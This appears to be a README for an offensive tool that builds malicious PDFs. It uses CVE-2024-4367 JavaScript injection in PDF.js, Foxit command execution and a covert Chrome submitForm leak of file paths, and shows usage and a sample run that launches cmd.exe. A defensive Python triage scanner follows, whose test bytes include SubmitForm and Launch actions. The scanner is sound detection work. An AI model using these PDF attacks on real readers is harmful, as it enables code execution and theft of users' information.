rzte/pdf-exploit
Integrates several recent PDF parser vulnerabilities to build PDF documents.

usage:

```
usage: pdf-exploit [-h] -f F [-p P] -o O [-pdfjs PDFJS] [-foxit-exec FOXIT_EXEC] [-foxit-args FOXIT_ARGS] [-submitForm SUBMITFORM]

options:
  -h, --help            show this help message and exit
  -f F                  the harmless pdf path
  -p P                  password
  -o O                  the new pdf file

pdfjs:
  CVE-2024-4367

  -pdfjs PDFJS          javascript to be executed, example: alert(3)

foxit:
  foxit pdf 'flawed design' explotation

  -foxit-exec FOXIT_EXEC
  -foxit-args FOXIT_ARGS

chrome:
  use submitForm of pdfium to steal pdf file path and other information

  -submitForm SUBMITFORM
                        The url to which the pdf path will be reported
```

example:

```
➜ pdf-exploit ./pdf.py -f ~/Downloads/data.pdf -o /tmp/data.pdf -pdfjs 'alert(3)' -foxit-exec cmd.exe -foxit-args "/c calc.exe"
[+] use the PDF.JS exploit: alert(3)
[+] make a text pdf
[+] make evil font
[+] fd ref: 9
[+] add font object to pdf: 10
[+] set font: /F1
[+] use the foxit exploit: cmd.exe /c calc.exe
set OpenAction to Catalog done
[+] store to /tmp/data.pdf
```

pdf-exploit

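Currently supported:

  • CVE-2024-4367: a flaw in how PDF.js parses PDFs allows arbitrary JavaScript to be executed.
  • Foxit PDF design flaw: on Windows, remote commands can be executed (a pop-up prompt is shown).
  • Chrome: uses submitForm to steal the local path of the PDF file (requires a click anywhere in the PDF, but the user does not notice).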
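For triage on the receiving side, the following added example (not part of this repository) flags the PDF constructs that correspond to the three features listed above: an OpenAction or Launch action, a SubmitForm action or `submitForm(` call, and a font whose `/FontMatrix` holds non-numeric entries. The non-numeric `/FontMatrix` check is an assumption based on the public description of CVE-2024-4367, the label names and sample bytes are constructed, and the scan only sees objects that are not inside compressed streams.

```python
import re

# PDF names can hide characters as #xx hex escapes (e.g. /Open#41ction).
_HEX = re.compile(rb"#([0-9A-Fa-f]{2})")
_NUM = re.compile(rb"[+-]?(?:\d+\.?\d*|\.\d+)")
_FONT_MATRIX = re.compile(rb"/FontMatrix\s*\[(.*?)\]", re.S)
_CHECKS = [  # (finding label, pattern searched after normalisation)
    ("auto-open-action", re.compile(rb"/OpenAction\b")),
    ("launch-action", re.compile(rb"/S\s*/Launch\b")),
    ("submit-form", re.compile(rb"/S\s*/SubmitForm\b|submitForm\s*\(")),
]

def normalise(data: bytes) -> bytes:
    """Decode #xx escapes so obfuscated names match the plain tokens."""
    return _HEX.sub(lambda m: bytes([int(m.group(1), 16)]), data)

def bad_font_matrices(data: bytes) -> list[bytes]:
    """Return /FontMatrix arrays holding anything other than numbers."""
    bad = []
    for m in _FONT_MATRIX.finditer(data):
        if any(not _NUM.fullmatch(tok) for tok in m.group(1).split()):
            bad.append(m.group(1))
    return bad

def triage(data: bytes) -> list[str]:
    """Return finding labels for one PDF's raw bytes, in a fixed order."""
    data = normalise(data)
    findings = [label for label, pat in _CHECKS if pat.search(data)]
    if bad_font_matrices(data):
        findings.append("non-numeric-fontmatrix")
    return findings

# Constructed samples, not taken from any real file.
SAMPLE_SUSPECT = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Open#41ction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Font /FontMatrix [0.001 0 0 0.001 0 (not-a-number)] >> endobj\n"
    b"3 0 obj << /S /SubmitForm /F (https://collector.example/report) >> endobj\n"
    b"4 0 obj << /S /Launch /F (placeholder) >> endobj\n"
)
SAMPLE_CLEAN = b"%PDF-1.7\n1 0 obj << /Type /Font /FontMatrix [0.001 0 0 0.001 0 0] >> endobj\n"

if __name__ == "__main__":
    for name, blob in (("suspect", SAMPLE_SUSPECT), ("clean", SAMPLE_CLEAN)):
        print(name, triage(blob))
```

A hit is a reason to quarantine and inspect the file with a full PDF parser, not a verdict; a clean result says nothing about objects held in compressed object streams.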
